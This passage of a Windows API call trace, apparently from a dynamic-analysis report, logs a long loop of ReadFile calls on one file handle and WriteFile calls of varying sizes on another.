lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.622] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.622] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.623] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.623] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.625] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.625] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.626] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x131, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.628] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ce, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.630] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.630] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.631] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.632] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.632] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.634] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.634] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.635] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.636] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.637] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.637] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.638] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.638] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.639] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.640] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.641] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.642] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.643] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.643] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.644] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.644] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.645] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.645] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x355, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.646] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.647] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.648] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.648] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.649] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.650] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x359, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x368, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.651] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.653] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.653] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.654] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.655] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.656] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.656] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.683] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x382, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.684] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.685] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ff, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.685] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.686] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.687] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.688] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x217, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.689] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x303, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.690] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.691] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.691] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.692] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.692] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.693] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.693] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.694] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.695] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 